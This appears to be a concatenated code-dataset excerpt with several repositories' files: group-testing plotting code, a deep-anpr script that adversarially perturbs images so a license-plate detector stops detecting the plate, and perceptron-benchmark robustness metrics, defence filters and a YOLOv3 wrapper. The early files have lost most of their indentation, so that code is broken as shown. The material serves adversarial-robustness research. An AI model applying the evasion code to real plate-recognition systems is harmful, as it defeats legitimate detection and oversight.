data = diff_eff_vals.transpose()
fig, ax = plt.subplots()
im = ax.imshow(data, cmap = cmap, extent = [0, 100, 100, 0])
cbar = ax.figure.colorbar(im, ax=ax)
ax.set_xlabel(r'$\theta_1$')
ax.set_ylabel(r'$\theta_2$')
ax.set_title("Difference in efficiency \n between correlated and naive pooling")
fig.tight_layout()
#plt.show()
    plt.contour(data, levels = [0], colors = 'r', linewidths=5)
ax.hlines(y=100, xmin=0, xmax=49, color='r', linestyle='-', linewidth=5)
ax.vlines(x=0.1, ymin=2, ymax=100, color='r', linestyle='-', linewidth=5)
plt.savefig('/home/yz685/group-testing-with-household-correlation/figs/counterexample.pdf', format='pdf', dpi=600, bbox_inches='tight')
if __name__ == '__main__':
plt.rcParams["font.family"] = 'serif'
plot_diff_efficiency()
```
#### File: group-testing-with-household-correlation/src/eval_p_index.py
```python
from scipy.optimize import fsolve
import numpy as np
from household_dist import HOUSEHOLD_DIST
def compute_household_infection_prob(prevalence, household_dist, SAR=0.3741):
"""
computes the probability that a household is infected given population level prevalence,
household size distribution and household secondary attack rate
INPUT:
prevalence = population level prevalence
household_dist = array-like, probability distribution of household sizes 1, 2, 3, ...
SAR = household secondary attack rate
"""
assert(np.absolute(np.sum(household_dist) - 1) < 1e-6)
exp_household_size = 0
exp_household_infection_multiplier = 0
for i in range(len(household_dist)):
exp_household_size += (i + 1) * household_dist[i]
exp_household_infection_multiplier += (1 + (i + 1 - 1) * SAR) * household_dist[i]
p = prevalence * exp_household_size / exp_household_infection_multiplier
return p
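# Worked example (illustrative numbers): with households of size 3 only
# (household_dist = [0, 0, 1]), prevalence 0.01 and SAR 0.3741, the expected
# household size is 3 and the infection multiplier is 1 + 2 * 0.3741 = 1.7482,
# so p = 0.01 * 3 / 1.7482, roughly 0.0172.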
# deprecated, modified from Massey's groupt testing code
def match_prevalence(p_index, target_prevalence, household_dist, SAR):
# computes probability of a primary case given population level prevalence, household size distribution,
# and household secondary attack rate
# INPUT:
# p_index = probability of a primary case in the household
# target_prevalence = population level prevalence
# household_dist = probability distribution of household sizes 1,2,3,...
# SAR = household secondary attack rate
assert(np.absolute(np.sum(household_dist) - 1) < 1e-6)
exp_household_size = 0
for i in range(len(household_dist)):
exp_household_size += (i + 1) * household_dist[i]
frac_tot_infected = 0
for i in range(len(household_dist)):
frac_tot_infected += (i + 1) * (p_index + SAR * (1 - p_index) - SAR * (1 - p_index) ** (i + 1)) * household_dist[
i] / exp_household_size
return frac_tot_infected - target_prevalence
# deprecated, modified from Massey's group testing code
def eval_p_index(match_prevalence, target_prevalence, household_dist, SAR=0.3741):
return fsolve(match_prevalence, 0.005, args=(target_prevalence, household_dist, SAR))
if __name__ == '__main__':
household_dist = HOUSEHOLD_DIST['US']
print("household infection probability (US population): " + str(compute_household_infection_prob(0.01, household_dist)))
print("household infection probability (household size = 3): " + str(compute_household_infection_prob(0.01, household_dist=[0,0,1])))
```
#### File: group-testing-with-household-correlation/src/plot_VL_and_table4.py
```python
import numpy as np
import matplotlib.pyplot as plt
def plot_VL(n_samples = 1000000):
mixture_weights = [0.33, 0.54, 0.13]
mixture_params = [[8.09, 1.06], [5.35, 0.89], [3.75, 0.39]]
samples = []
for _ in range(n_samples):
component = np.random.choice(3, p = mixture_weights)
mean, sd = mixture_params[component]
samples.append(np.random.normal(loc = mean, scale = sd))
plt.rcParams["font.family"] = 'serif'
plt.hist(samples, bins = 100, density = True)
plt.title('log10 viral load distribution')
plt.xlabel('log10 viral load')
plt.ylabel('Density')
# plt.savefig('log10_VL_density.pdf')
def plot_table_4():
prevs = ['0.1%', '0.5%', '1%', '5%', '10%']
np_sizes = [40, 15, 12, 6, 4]
cp_sizes = [40, 20, 12, 6, 4]
np_sens_times_eff = [13.52, 6.29, 4.56, 2.17, 1.59]
cp_sens_times_eff = [15.86, 7.26, 5.23, 2.44, 1.72]
plt.rcParams["font.family"] = 'serif'
plt.plot(np.arange(5), [1/np_sens_times_eff[i] for i in range(5)],
color = 'mediumpurple', marker = '^', linestyle = '--', label = 'naive')
plt.plot(np.arange(5), [1/cp_sens_times_eff[i] for i in range(5)],
color = 'mediumaquamarine', marker = 'o', linestyle = '-', label = 'correlated')
plt.xticks(np.arange(5), prevs)
for i in range(5):
plt.annotate(np_sizes[i], (i-0.2, 1/np_sens_times_eff[i]))
plt.annotate(cp_sizes[i], (i+0.11, 1/cp_sens_times_eff[i]-0.01))
plt.xlabel('Prevalence')
plt.ylabel(r'$(Sensitivity * Efficiency)^{-1}$')
plt.legend()
plt.title(r'$(Sensitivity * Efficiency)^{-1}$ for naive and correlated pooling')
# plt.savefig('sens_eff.pdf')
``` |
{
"source": "jiayunhan/deep-anpr",
"score": 2
} |
#### File: jiayunhan/deep-anpr/detect_attack.py
```python
__all__ = (
'detect',
'post_process',
)
import collections
import itertools
import math
import sys
import cv2
import numpy
import tensorflow as tf
import common
import model
from detect_get_logits import get_attack_logits
def make_scaled_ims(im, min_shape):
ratio = 1. / 2 ** 0.5
shape = (im.shape[0] / ratio, im.shape[1] / ratio)
while True:
shape = (int(shape[0] * ratio), int(shape[1] * ratio))
if shape[0] < min_shape[0] or shape[1] < min_shape[1]:
break
yield cv2.resize(im, (shape[1], shape[0]))
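# make_scaled_ims yields an image pyramid: the first yielded image is roughly the
# original size, and each subsequent one shrinks by a factor of 2**0.5 per dimension
# until it no longer covers the detection window (model.WINDOW_SHAPE).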
def detect(im, param_vals):
"""
Detect number plates in an image.
:param im:
Image to detect number plates in.
:param param_vals:
Model parameters to use. These are the parameters output by the `train`
module.
:returns:
Iterable of `bbox_tl, bbox_br, letter_probs`, defining the bounding box
top-left and bottom-right corners respectively, and a 7,36 matrix
giving the probability distributions of each letter.
"""
# Convert the image to various scales.
scaled_ims = list(make_scaled_ims(im, model.WINDOW_SHAPE))
#scaled_ims = hide_attack(im, param_vals)
#print(scaled_ims[0].shape)
# Load the model which detects number plates over a sliding window.
x, y, params = model.get_detect_model()
# Execute the model at each scale.
with tf.Session(config=tf.ConfigProto()) as sess:
y_vals = []
for scaled_im in scaled_ims:
feed_dict = {x: numpy.stack([scaled_im])}
feed_dict.update(dict(zip(params, param_vals)))
y_vals.append(sess.run(y, feed_dict=feed_dict))
print(y_vals[0].shape)
# Interpret the results in terms of bounding boxes in the input image.
# Do this by identifying windows (at all scales) where the model predicts a
# number plate has a greater than 50% probability of appearing.
#
# To obtain pixel coordinates, the window coordinates are scaled according
# to the stride size, and pixel coordinates.
count = 0
for i, (scaled_im, y_val) in enumerate(zip(scaled_ims, y_vals)):
for window_coords in numpy.argwhere(y_val[0, :, :, 0] >
-math.log(1./0.99 - 1)):
count = count + 1
letter_probs = (y_val[0,
window_coords[0],
window_coords[1], 1:].reshape(
7, len(common.CHARS)))
letter_probs = common.softmax(letter_probs)
img_scale = float(im.shape[0]) / scaled_im.shape[0]
bbox_tl = window_coords * (8, 4) * img_scale
bbox_size = numpy.array(model.WINDOW_SHAPE) * img_scale
present_prob = common.sigmoid(
y_val[0, window_coords[0], window_coords[1], 0])
yield bbox_tl, bbox_tl + bbox_size, present_prob, letter_probs
#print("Detected count: ", count)
def detect_max_shape(im, param_vals):
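    """
    Return the shape of the scaled image whose highest-probability detection
    window is the most confident across all scales; used to pick the working
    resolution for the attack below.
    """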
scaled_ims = list(make_scaled_ims(im, model.WINDOW_SHAPE))
x, y, params = model.get_detect_model()
# Execute the model at each scale.
with tf.Session(config=tf.ConfigProto()) as sess:
y_vals = []
for scaled_im in scaled_ims:
feed_dict = {x: numpy.stack([scaled_im])}
feed_dict.update(dict(zip(params, param_vals)))
y_vals.append(sess.run(y, feed_dict=feed_dict))
# Interpret the results in terms of bounding boxes in the input image.
# Do this by identifying windows (at all scales) where the model predicts a
    # number plate has a greater than 99% probability of appearing (the
    # sigmoid of the -math.log(1./0.99 - 1) logit threshold used below).
    #
    # To obtain pixel coordinates, the window coordinates are scaled according
    # to the stride size and the image scale.
max_im = scaled_ims[0]
max_prob = 0
for i, (scaled_im, y_val) in enumerate(zip(scaled_ims, y_vals)):
for window_coords in numpy.argwhere(y_val[0, :, :, 0] >
-math.log(1./0.99 - 1)):
letter_probs = (y_val[0,
window_coords[0],
window_coords[1], 1:].reshape(
7, len(common.CHARS)))
letter_probs = common.softmax(letter_probs)
img_scale = float(im.shape[0]) / scaled_im.shape[0]
bbox_tl = window_coords * (8, 4) * img_scale
bbox_size = numpy.array(model.WINDOW_SHAPE) * img_scale
present_prob = common.sigmoid(
y_val[0, window_coords[0], window_coords[1], 0])
if(present_prob > max_prob):
max_prob = present_prob
max_im = scaled_im
return max_im.shape
def isDetected(im, param_vals):
im_gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY) / 255.
scaled_ims = list(make_scaled_ims(im_gray, model.WINDOW_SHAPE))
x, y, params = model.get_detect_model()
with tf.Session(config=tf.ConfigProto()) as sess:
y_vals = []
for scaled_im in scaled_ims:
feed_dict = {x: numpy.stack([scaled_im])}
feed_dict.update(dict(zip(params, param_vals)))
y_vals.append(sess.run(y, feed_dict=feed_dict))
count = 0
for i, (scaled_im, y_val) in enumerate(zip(scaled_ims, y_vals)):
for window_coords in numpy.argwhere(y_val[0, :, :, 0] > -math.log(1./0.99 - 1)):
count = count + 1 #only care about number of boxes it can detect
print("COUNT: ", count)
return count != 0
def original_img_hide_attack_color(im, param_vals):
def perturb(img, param_vals):
x_origin = tf.Variable(tf.zeros(img.shape))
assign_origin_op = tf.assign(x_origin, img)
#convert image to gray so it can pass through detect model
im_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) / 255.
#resize colored image to match best scaled image shape
max_im_shape = detect_max_shape(im_gray, param_vals)
im_color_resize = tf.squeeze(tf.image.resize_images(x_origin, (max_im_shape[0], max_im_shape[1])))
img_gray = tf.image.rgb_to_grayscale(im_color_resize) #(250,250,1)
im_gray = tf.squeeze(tf.cast(img_gray, numpy.float32)) #(250,250)
input = tf.stack([im_gray]) #(1,250,250)
_, y, params = model.get_detect_model(input)
#mean over reduced probability for presence and letter detection, y[:,:,:,0] for just presence
y_mean = tf.reduce_mean(y)
optim_step = tf.train.GradientDescentOptimizer(3).minimize(y_mean, var_list = [x_origin])
adv = []
#create bounds for how far the image can deviate
epsilon = tf.placeholder(tf.float32, ())
below = img - epsilon
above = img + epsilon
projected = tf.clip_by_value(tf.clip_by_value(x_origin, below, above), 0, 255)
with tf.control_dependencies([projected]):
project_step = tf.assign(x_origin, projected)
#training
with tf.Session(config=tf.ConfigProto()) as sess:
sess.run(assign_origin_op)
feed_dict = {}
feed_dict.update(dict(zip(params, param_vals)))
for i in range(400):
sess.run(optim_step,feed_dict = feed_dict)
sess.run(project_step, feed_dict = {epsilon: 8000/255.0})
print(sess.run(y_mean, feed_dict = feed_dict))
if(isDetected(x_origin.eval().astype(numpy.uint8), param_vals) == False):
break
adv = (x_origin.eval().astype(numpy.uint8))
return adv
return perturb(im, param_vals)
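# Note on the projection used in original_img_hide_attack_color (illustrative
# arithmetic, not a comment from the original file): epsilon is fed in as
# 8000/255 ~= 31.4, so after every gradient step each pixel of x_origin is
# clipped back to within roughly 31 intensity levels of the original image
# (and to the valid [0, 255] range) before the next iteration.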
def _overlaps(match1, match2):
bbox_tl1, bbox_br1, _, _ = match1
bbox_tl2, bbox_br2, _, _ = match2
return (bbox_br1[0] > bbox_tl2[0] and
bbox_br2[0] > bbox_tl1[0] and
bbox_br1[1] > bbox_tl2[1] and
bbox_br2[1] > bbox_tl1[1])
def _group_overlapping_rectangles(matches):
matches = list(matches)
num_groups = 0
match_to_group = {}
for idx1 in range(len(matches)):
for idx2 in range(idx1):
if _overlaps(matches[idx1], matches[idx2]):
match_to_group[idx1] = match_to_group[idx2]
break
else:
match_to_group[idx1] = num_groups
num_groups += 1
groups = collections.defaultdict(list)
for idx, group in match_to_group.items():
groups[group].append(matches[idx])
return groups
def post_process(matches):
"""
Take an iterable of matches as returned by `detect` and merge duplicates.
Merging consists of two steps:
- Finding sets of overlapping rectangles.
- Finding the intersection of those sets, along with the code
corresponding with the rectangle with the highest presence parameter.
"""
groups = _group_overlapping_rectangles(matches)
for group_matches in groups.values():
        mins = numpy.stack([numpy.array(m[0]) for m in group_matches])
        maxs = numpy.stack([numpy.array(m[1]) for m in group_matches])
        present_probs = numpy.array([m[2] for m in group_matches])
        letter_probs = numpy.stack([m[3] for m in group_matches])
yield (numpy.max(mins, axis=0).flatten(),
numpy.min(maxs, axis=0).flatten(),
numpy.max(present_probs),
letter_probs[numpy.argmax(present_probs)])
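# Hypothetical usage of detect() and post_process() (illustrative sketch,
# mirroring the __main__ block below): `im_gray` is a grayscale image scaled
# to [0, 1] and `param_vals` are the trained weights loaded from the .npz file.
#   for tl, br, prob, letter_probs in post_process(detect(im_gray, param_vals)):
#       print(tl, br, prob, letter_probs_to_code(letter_probs))
# Each merged group keeps the intersection of its overlapping boxes and the
# letter probabilities of the member with the highest presence probability.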
def print_help():
print("\nToo few arguments. Expected: 3")
print("Usage: python detect.py [input_image] [weights] [output_image]\n")
def letter_probs_to_code(letter_probs):
return "".join(common.CHARS[i] for i in numpy.argmax(letter_probs, axis=1))
if __name__ == "__main__":
    if len(sys.argv) < 4:
print_help()
exit()
f = numpy.load(sys.argv[2])
param_vals = [f[n] for n in sorted(f.files, key=lambda s: int(s[4:]))]
im = cv2.imread(sys.argv[1])
img_color = original_img_hide_attack_color(im, param_vals)
im_gray = cv2.cvtColor(img_color, cv2.COLOR_BGR2GRAY) / 255.
#print(img_color)
cv2.imwrite('perturbed' + sys.argv[3], img_color)
for pt1, pt2, present_prob, letter_probs in post_process(
detect(im_gray, param_vals)):
        pt1 = tuple(reversed(list(map(int, pt1))))
        pt2 = tuple(reversed(list(map(int, pt2))))
code = letter_probs_to_code(letter_probs)
color = (0.0, 255.0, 0.0)
cv2.rectangle(im, pt1, pt2, color)
cv2.putText(im,
code,
pt1,
cv2.FONT_HERSHEY_PLAIN,
1.5,
(0, 0, 0),
thickness=5)
cv2.putText(im,
code,
pt1,
cv2.FONT_HERSHEY_PLAIN,
1.5,
(255, 255, 255),
thickness=2)
cv2.imwrite(sys.argv[3], im)
``` |
{
"source": "jiayunhan/perceptron-benchmark",
"score": 3
} |
#### File: perceptron/benchmarks/gaussian_blur.py
```python
import numpy as np
from tqdm import tqdm
from collections.abc import Iterable
from scipy.ndimage.filters import gaussian_filter
from .base import Metric
from .base import call_decorator
class GaussianBlurMetric(Metric):
"""Metric that tests models against Gaussian blurs."""
@call_decorator
def __call__(self, adv, annotation=None, unpack=True,
abort_early=True, epsilons=10000):
"""Blurs the image until it is misclassified.
Parameters
----------
adv : `numpy.ndarray`
The original, unperturbed input as a `numpy.ndarray`.
annotation : int
The reference label of the original input.
unpack : bool
If true, returns the adversarial input, otherwise returns
the Adversarial object.
abort_early : bool
If true, returns when got first adversarial, otherwise
returns when all the iterations are finished.
epsilons : int or Iterable[float]
Either Iterable of standard deviations of the Gaussian blur
or number of standard deviations between 0 and 1 that should
be tried.
"""
a = adv
del adv
del annotation
del unpack
image = a.original_image
min_, max_ = a.bounds()
axis = a.channel_axis(batch=False)
hw = [image.shape[i] for i in range(image.ndim) if i != axis]
h, w = hw
size = max(h, w)
if not isinstance(epsilons, Iterable):
epsilons = np.linspace(0, 0.2, num=epsilons + 1)[1:]
for epsilon in tqdm(epsilons):
# epsilon = 1 will correspond to
# sigma = size = max(width, height)
sigmas = [epsilon * size] * 3
sigmas[axis] = 0
blurred = gaussian_filter(image, sigmas)
blurred = np.clip(blurred, min_, max_)
_, is_adversarial = a.predictions(blurred)
if is_adversarial and abort_early:
return
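# Illustrative numbers for the sweep above (not part of the original file):
# for a 224x224 RGB image, size = 224, so epsilon = 0.1 gives sigma = 22.4 on
# both spatial axes and 0 on the channel axis (channels are blurred
# independently); the default epsilon grid therefore sweeps sigma from just
# above 0 up to 0.2 * 224 = 44.8.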
```
#### File: perceptron/benchmarks/interval_analysis.py
```python
import warnings
import logging
import numpy as np
from tqdm import tqdm
from abc import ABC
from abc import abstractmethod
from .base import Metric
from .base import call_decorator
from perceptron.utils.image import onehot_like
from perceptron.utils.func import to_tanh_space
from perceptron.utils.func import to_model_space
from perceptron.utils.func import AdamOptimizer
from perceptron.utils.interval_analyze import symbolic, naive
class IntervalMetric(Metric, ABC):
"""The base class of interval analysis used for network
formal verifications.
This verification method is described in [1,2]_. This
implementation is based on the symbolic interval lib
in [3]_.
References
----------
.. [1] <NAME>, <NAME>, <NAME>, <NAME>,
<NAME>ana : "Formal Security Analysis of Neural Networks
using Symbolic Intervals", https://arxiv.org/abs/1804.10829
.. [2] <NAME>, <NAME>, <NAME>, <NAME>,
<NAME>ana : "Efficient Formal Safety Analysis of Neural
Networks", https://arxiv.org/abs/1809.08098
.. [3] https://github.com/tcwangshiqi-columbia/symbolic_interval
"""
@call_decorator
def __call__(self, adv, optimal_bound=False, epsilon=None,
parallel=False, unpack=False, annotation=None,
normalize=False, threshold=0.001):
""" The Linf version of interval analysis. It will add two
parameters into adversarial: (1) is_verified: whether the
sample is verified to be safe under given epsilon;
(2) opt: the optimal bound for verifying the property safe
Parameters
----------
adv : An class:`Adversarial` instance
Keep all the information needed
optimal_bound : Bool
Whether we need to locate the minimal Linf bound that
can be verified to be safe.
epsilon : float
The Linf epsilon range.
If optimal_bound is False, it will serve as the testing epsilon.
If optimal_bound is True, it will serve as the starting epsilon
for searching the optimal one.
parallel : Bool
whether to parallelize the testing
unpack : bool
If true, returns the adversarial input, otherwise returns
the Adversarial object.
annotation : int
The reference label of the original input.
normalize : Bool
Whether the input is normalized. Usually, MNIST will not be
normalized while cifar10 will be normalized with 0.225.
threshold : float
The minimal threshold for the binary search
"""
assert epsilon is not None, "Provide an epsilon for verification!"
a = adv
del adv
del annotation
if not optimal_bound:
is_verified = self.analyze(a, epsilon, parallel=parallel)
if is_verified:
print("The model is proved to be safe with "
"given epsilon {0:.3f}".format(epsilon))
else:
print("Can not be verified with given "
"epsilon {0:.3f}".format(epsilon))
if optimal_bound:
opt = self.analyze_bound(a, epsilon, threshold=0.001, parallel=parallel)
if normalize:
opt = opt * 0.225 * 255
else:
opt = opt * 255
print("optimal bound found to be {0:.3f} out of 0 to 255".format(opt))
# Avoid warning for not finding the adversarial examples
a._best_adversarial = a._original_image
return None
def analyze(self, adv, epsilon, parallel=False):
"""To be extended with different interval analysis methods."""
raise NotImplementedError
def analyze_bound(self, adv, epsilon, threshold=0.001, parallel=False):
""" Return the optimal bound provided by interval analysis.
It indicates the largest Linf bound that is verified to be
absent of adversarial examples under arbitrary attacks. The
optimal bound is located by binary search.
Parameters
----------
adv : An class:`Adversarial` instance
Keep all the information needed
epsilon : float
The Linf epsilon range. Serves as the starting epsilon
for searching the optimal one.
threshold : float
The minimal threshold for the binary search
parallel : Bool
whether to parallelize the testing
"""
bound = epsilon
upper_bound = 1
lower_bound = 0
# binary search for the optimal bound
while upper_bound - lower_bound > threshold:
is_verified = self.analyze(adv, bound, parallel=parallel)
if is_verified:
# print("The model is proved to be safe with given epsilon", bound)
lower_bound = bound
else:
# print("can not be verified with given epsilon", bound)
upper_bound = bound
bound = (upper_bound + lower_bound) / 2.0
return bound
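    # Rough cost of the binary search above (illustrative): the [0, 1]
    # interval is roughly halved on every iteration, so with the default
    # threshold of 0.001 about ceil(log2(1 / 0.001)) ~= 10 calls to
    # self.analyze() are made, regardless of the starting epsilon.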
class SymbolicIntervalMetric(IntervalMetric):
@staticmethod
def analyze(adv, epsilon, parallel=False):
""" Return whether the example is verified to be save
within the given Linf <= epsilon analyzed by symbolic
interval analysis.
Parameters
----------
adv : An class:`Adversarial` instance
Keep all the information needed
epsilon : float
The Linf epsilon range for testing
parallel : Bool
whether to parallelize the testing
"""
iloss, ierr = symbolic(adv._model._model, epsilon,\
adv._original_image,\
adv._original_pred,\
parallel=parallel)
if ierr:
is_verified = False
else:
is_verified = True
return is_verified
class NaiveIntervalMetric(IntervalMetric):
@staticmethod
def analyze(a, epsilon, parallel=False):
""" Return whether the example is verified to be save
within the given Linf <= epsilon analyzed by naive
interval analysis.
Parameters
----------
adv : An class:`Adversarial` instance
Keep all the information needed.
epsilon : float
The Linf epsilon range for testing.
parallel : Bool
whether to parallelize the testing
"""
iloss, ierr = naive(a._model._model, epsilon,\
a._original_image,
a._original_pred,\
parallel=parallel)
if ierr:
is_verified = False
else:
is_verified = True
return is_verified
```
#### File: perceptron/benchmarks/translation.py
```python
from abc import abstractmethod
import numpy as np
from tqdm import tqdm
from collections.abc import Iterable
import math
from .base import Metric
from .base import call_decorator
import warnings
class TranslationMetric(Metric):
"""Metric that tests models against translations."""
@call_decorator
def __call__(self, adv, pix_range=None, annotation=None, unpack=True,
abort_early=True, verify=False, epsilons=100):
"""Translate the image until it is misclassified.
Parameters
----------
adv : `numpy.ndarray`
The original, unperturbed input as a `numpy.ndarray`.
pix_range : int or (int, int)
pix_range of pixels for translation attack
annotation : int
The reference label of the original input.
unpack : bool
If true, returns the adversarial input, otherwise returns
the Adversarial object.
abort_early : bool
If true, returns when got first adversarial, otherwise
returns when all the iterations are finished.
verify : bool
if True, return verifiable bound
epsilons : int or Iterable[float]
            Either an Iterable of translation distances (in pixels) or
            the number of translation steps that should be tried.
            Epsilons are not used if verify = True.
"""
if verify is True:
warnings.warn('epsilon is not used in verification mode '
'and abort_early is set to True.')
if isinstance(pix_range, int):
pix_range = (pix_range, pix_range)
if pix_range:
            assert len(pix_range) == 2, \
                "pix_range has to be an int or a " \
                "(pix_range_low, pix_range_high) pair"
            assert pix_range[0] <= pix_range[1], \
                "pix_range[0] should be smaller than pix_range[1]"
a = adv
del adv
del annotation
del unpack
image = a.original_image
min_, max_ = a.bounds()
axis = a.channel_axis(batch=False)
hw = [image.shape[i] for i in range(image.ndim) if i != axis]
        img_height, img_width = hw
translate_type, translate_max_bound = self._get_type(hw)
if verify:
epsilons_ub = np.arange(1, translate_max_bound, 1)
epsilons_lb = np.arange(-1, -1 * translate_max_bound, -1)
elif not isinstance(epsilons, Iterable):
if not pix_range:
range_max = translate_max_bound
range_min = -1 * translate_max_bound
else:
range_max = pix_range[1]
range_min = pix_range[0]
if range_min >= 0:
epsilons = np.minimum(translate_max_bound, epsilons)
epsilons_ub = np.linspace(
range_min, range_max, num=epsilons)
epsilons_lb = []
elif range_max <= 0:
epsilons = np.minimum(translate_max_bound, epsilons)
epsilons_ub = []
epsilons_lb = np.linspace(
range_max, range_min, num=epsilons)
else:
epsilons = np.minimum(2 * translate_max_bound, epsilons)
                epsilons_ub = np.linspace(
                    0, range_max, num=epsilons // 2 + 1)[1:]
                epsilons_lb = np.linspace(
                    0, range_min, num=epsilons // 2 + 1)[1:]
else:
epsilons_ub = epsilons
epsilons_lb = []
        epsilons_ub = np.asarray(epsilons_ub).astype(int)
        epsilons_lb = np.asarray(epsilons_lb).astype(int)
upper_bound = 0
lower_bound = 0
if axis == 0:
image_cv = np.transpose(image, (1, 2, 0))
elif axis == 2:
image_cv = np.copy(image)
else:
raise ValueError('Invalid axis.')
import cv2
print('Generating adversarial examples.')
for idx, epsilon in enumerate(tqdm(epsilons_ub)):
epsilon = int(epsilon)
if translate_type == 'horizontal':
M = np.float32([[1, 0, epsilon], [0, 1, 0]])
elif translate_type == 'vertical':
M = np.float32([[1, 0, 0], [0, 1, epsilon]])
else:
raise ValueError('Invalid translate_type')
perturbed = cv2.warpAffine(image_cv, M, (img_width, img_height))
if axis == 0:
perturbed = np.transpose(perturbed, (2, 0, 1))
_, is_adversarial = a.predictions(perturbed)
if is_adversarial:
epsilon_ub_idx = idx
perturbed_ub = perturbed
if abort_early or verify:
break
else:
upper_bound = epsilon
a.verifiable_bounds = (upper_bound, lower_bound)
for idx, epsilon in enumerate(tqdm(epsilons_lb)):
epsilon = int(epsilon)
if translate_type == 'horizontal':
M = np.float32([[1, 0, epsilon], [0, 1, 0]])
elif translate_type == 'vertical':
M = np.float32([[1, 0, 0], [0, 1, epsilon]])
else:
raise ValueError('Invalid translate_type')
perturbed = cv2.warpAffine(image_cv, M, (img_width, img_height))
if axis == 0:
perturbed = np.transpose(perturbed, (2, 0, 1))
_, is_adversarial = a.predictions(perturbed)
if is_adversarial:
epsilon_lb_idx = idx
perturbed_lb = perturbed
if abort_early or verify:
break
else:
lower_bound = epsilon
a.verifiable_bounds = (upper_bound, lower_bound)
return
@abstractmethod
def _get_type(self, hw):
raise NotImplementedError
class HorizontalTranslationMetric(TranslationMetric):
"""Horizontally Translate the image until it is misclassified."""
def _get_type(self, hw):
return 'horizontal', hw[1]
class VerticalTranslationMetric(TranslationMetric):
"""Vertically Translate the image until it is misclassified."""
def _get_type(self, hw):
return 'vertical', hw[0]
```
#### File: perceptron/defences/filters.py
```python
import numpy as np
from scipy import ndimage
import cv2
class BinaryFilter():
"""Binary filter as feature squeezer as described in [1]_.
References
----------
    .. [1] Weilin Xu et al.: "Feature Squeezing: Detecting Adversarial
        Examples in Deep Neural Networks."
"""
def __init__(self):
pass
def __call__(self, img_batch_np, threshold):
"""Squeeze image by binary filter
Parameters
----------
img_batch_np : array
Input image batch or image
threshold : float
            Threshold for binarization
"""
x_bin = np.maximum(np.sign(img_batch_np - threshold), 0)
return x_bin
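# Illustrative usage (hypothetical data, not from the original file):
# binarizing a [0, 1] image batch with threshold 0.5 maps every pixel at or
# below 0.5 to 0.0 and everything above to 1.0.
#   squeezer = BinaryFilter()
#   x_bin = squeezer(np.random.rand(2, 32, 32, 3), threshold=0.5)
#   assert set(np.unique(x_bin)) <= {0.0, 1.0}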
class BinaryRandomFilter():
"""Binary filter with randomness."""
def __init__(self):
pass
def __call__(self, img_batch_np, threshold, stddev=0.125):
"""Squeeze noise added image by binary filter.
Parameters
----------
img_batch_np : array
Input image batch or image
threshold : float
            Threshold for binarization
        stddev : float
            Standard deviation for Gaussian noise
"""
if stddev == 0.:
rand_array = np.zeros(img_batch_np.shape)
else:
rand_array = np.random.normal(loc=0.,
scale=stddev,
size=img_batch_np.shape)
x_bin = np.maximum(np.sign(np.add(img_batch_np,
rand_array) - threshold), 0)
return x_bin
class MedianFilter():
"""Median filter as feature squeezer as described in [1]_.
References
----------
    .. [1] Weilin Xu et al.: "Feature Squeezing: Detecting Adversarial
        Examples in Deep Neural Networks."
"""
def __init__(self):
pass
def __call__(self, img_batch_np, width, height=-1):
"""Squeeze image by meadia filter
Parameters
----------
img_batch_np : array
Input image batch or image
width : int
The width of the sliding window (number of pixels)
height : int
The height of the window. The same as width by default.
"""
if height == -1:
height = width
x_mid = ndimage.filters.median_filter(img_batch_np,
size=(1, width, height, 1),
mode='reflect'
)
return x_mid
```
#### File: models/detection/keras_yolov3.py
```python
from __future__ import absolute_import
import numpy as np
import logging
import os
from perceptron.models.base import DifferentiableModel
from perceptron.utils.criteria.detection import TargetClassMiss, RegionalTargetClassMiss
from keras import backend as K
import keras
class KerasYOLOv3Model(DifferentiableModel):
"""Create a :class:`Model` instance from a `Keras` model.
Parameters
----------
model : `keras.model.Model`
The `Keras` model that are loaded.
bounds : tuple
Tuple of lower and upper bound for the pixel values, usually
(0, 1) or (0, 255).
model_image_shape : tuple
Tuple of the model input shape in format (height, width).
channel_axis : int
The index of the axis that represents color channels.
num_scales : int
Number of scales, if the model detects object at
different distances.
num_anchors : int
Number of anchor boxes for each scale.
num_classes : int
Number of classes for which the model will output predictions.
max_boxes : int
The maximum number of boxes allowed in the prediction output.
anchors_path : str
The path to the file containing anchor box coordinates.
classes_path : str
The path to the file containing class names.
score : float
The score threshold for considering a box as containing objects.
iou : float
The intersection over union (IoU) threshold.
preprocessing: 2-element tuple with floats or numpy arrays
        Elementwise preprocessing of input; we first subtract the first
element of preprocessing from the input and then divide the input
by the second element.
"""
def __init__(
self,
model,
bounds,
model_image_shape=(416, 416),
channel_axis=3,
num_scales=3,
num_anchors=3,
num_classes=80,
max_boxes=20,
anchors_path='yolov3_anchors.txt',
classes_path='coco_classes.txt',
score=0.3,
iou=0.45,
preprocessing=(0, 1)):
super(KerasYOLOv3Model, self).__init__(bounds=bounds,
channel_axis=channel_axis,
preprocessing=preprocessing)
# Check if model data files exist.
model_data_path = os.path.join(
os.path.dirname(__file__),
'../../zoo/yolov3/model_data/')
model_input = model.input
model_output = model.output
# model_output should be list of ndarrays.
assert len(model_output) == num_scales, \
"number of scales doesn't match model output"
logits_per_grid = model_output[0].shape[-1]
assert (num_classes + 5) * num_anchors == logits_per_grid, \
"number of logits per grid cell doesn't match model output"
self._task = 'det'
self._model_image_shape = model_image_shape
self._num_classes = num_classes
self._num_scales = num_scales
self._num_anchors = num_anchors
self._classes_path = os.path.join(model_data_path, classes_path)
self._class_names = self.get_class()
self._anchors_path = os.path.join(model_data_path, anchors_path)
self._anchors = self._get_anchors()
self._score = score
self._iou = iou
self._max_boxes = max_boxes
_boxes, _box_scores, _box_confidence_logits, \
_box_class_probs_logits, _box_coord_logits = self._gather_feats(
model_output, self._anchors,
self._num_classes, self._model_image_shape)
boxes, scores, classes = self._eval_pred(
_boxes, _box_scores, self._num_classes,
self._max_boxes, self._score, self._iou)
# For attack use only.
target_class = K.placeholder(dtype='int32')
tgt_cls_loss = self._target_class_loss(
target_class, _box_scores, _box_class_probs_logits)
tgt_cls_gradient = K.gradients(tgt_cls_loss, model_input)
tgt_cls_gradient = tgt_cls_gradient[0]
tgt_cls_gradient = K.squeeze(tgt_cls_gradient, axis=0)
self._batch_gather_feats_fn = K.function(
[model_input],
[_boxes, _box_scores, _box_confidence_logits,
_box_class_probs_logits, _box_coord_logits])
self._batch_pred_fn = K.function(
[_boxes, _box_scores],
[boxes, scores, classes]
)
self._tgt_cls_bw_grad_fn = K.function(
[target_class, model_input],
[tgt_cls_loss, tgt_cls_gradient]
)
